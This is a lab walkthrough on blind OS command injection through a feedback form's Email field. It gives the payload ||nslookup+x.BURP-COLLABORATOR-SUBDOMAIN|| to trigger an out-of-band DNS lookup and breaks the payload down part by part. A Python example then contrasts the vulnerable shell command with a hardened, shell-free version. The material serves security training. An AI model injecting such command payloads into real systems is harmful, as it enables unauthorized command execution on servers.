Blind OS command injection with out-of-band interaction

Lab Description

Walkthrough

Step 1: Understanding the Feedback Functionality

The Submit Feedback page contains four input fields:

  • Name

  • Email

  • Subject

  • Message

Our goal is to test whether these fields are vulnerable to command injection by leveraging out-of-band (OOB) interactions via DNS lookups to Burp Collaborator.

Step 2: Intercepting the Feedback Request

Using Burp Suite, intercept the HTTP request when submitting feedback. The intercepted request will contain parameters corresponding to the form inputs.

Objective: Modify one of these parameters to execute a payload that triggers a DNS lookup to Burp Collaborator.

Step 3: Crafting and Injecting the Payload

In the Email field, inject the following payload:

||nslookup+x.BURP-COLLABORATOR-SUBDOMAIN||

This payload triggers a DNS lookup for the subdomain generated by Burp Collaborator, confirming that the server executes commands.

Payload Breakdown:

  • ||: The shell OR operator. It terminates the command the application was already building, and the command that follows it runs if the preceding one fails; the trailing || likewise separates the injected command from anything the application appends after the parameter.

  • nslookup: A command to perform DNS lookups.

  • x.BURP-COLLABORATOR-SUBDOMAIN: x is an arbitrary label; replace BURP-COLLABORATOR-SUBDOMAIN with the subdomain generated by Burp Collaborator so the resulting lookup can be monitored.

Submit the request with the modified payload.

  • The server responds with 200 OK. Because the injection is blind, the response body shows no command output, so the 200 only shows the request was accepted; execution is confirmed out-of-band in the next step.

Step 4: Verifying Out-of-Band Interaction

Switch to the Burp Collaborator tab and click Poll now.

  • Observe DNS requests generated by the server to your subdomain.

Why Use Out-of-Band Interaction?

When the server does not return command output or write it to an accessible location, OOB interaction is the best way to verify that a command was executed. DNS lookups leave a trace on external systems, enabling confirmation of blind vulnerabilities without requiring direct output.
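As an added illustration of the payload breakdown above and of why the injection is blind, the following Python example (not part of the lab or the original page) models a hypothetical feedback handler that shells out to a mailer with the submitted e-mail address. It shows the command line the vulnerable version would hand to a shell, how `||` splits it into separate commands, and a hardened version that validates the address and executes the mailer as an argv list with no shell. The mailer path and the feedback file are assumptions; nothing is executed.

```python
import re
import subprocess

# Assumed mailer path for this constructed example.
MAILER = "/usr/bin/mail"
FEEDBACK_FILE = "/tmp/feedback.txt"  # assumed location of the message body


def vulnerable_command(email: str, subject: str) -> str:
    """Return the command string the vulnerable handler would pass to
    `sh -c`. Only the string is built here; it is never executed."""
    return f'{MAILER} -s "{subject}" {email} < {FEEDBACK_FILE}'


def injected_commands(cmdline: str) -> list[str]:
    """Split a command line on the '||' operator, approximating how a
    POSIX shell turns one string into several commands (simplified:
    quoting inside the string is ignored)."""
    return [part.strip() for part in cmdline.split("||") if part.strip()]


# Allowlist pattern for the e-mail field: local part, one '@', dotted
# host labels. Shell metacharacters such as '|', ';', '&' and spaces are
# not in the allowed set, so the lab payload is rejected outright.
EMAIL_RE = re.compile(r"^[A-Za-z0-9._%+-]+@[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)+$")


def hardened_argv(email: str, subject: str) -> list[str]:
    """Validate the address and build an argv list. Each value is a single
    argument; no shell ever parses it, so '||' in a field cannot start a
    second command."""
    if not EMAIL_RE.fullmatch(email):
        raise ValueError("rejected e-mail address")
    return [MAILER, "-s", subject, email]


def run_hardened(email: str, subject: str) -> int:
    """Execute the mailer without a shell (shell=False is the default).
    Not called in this example; returns the process exit code."""
    with open(FEEDBACK_FILE, "rb") as body:
        proc = subprocess.run(hardened_argv(email, subject), stdin=body)
    return proc.returncode
```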
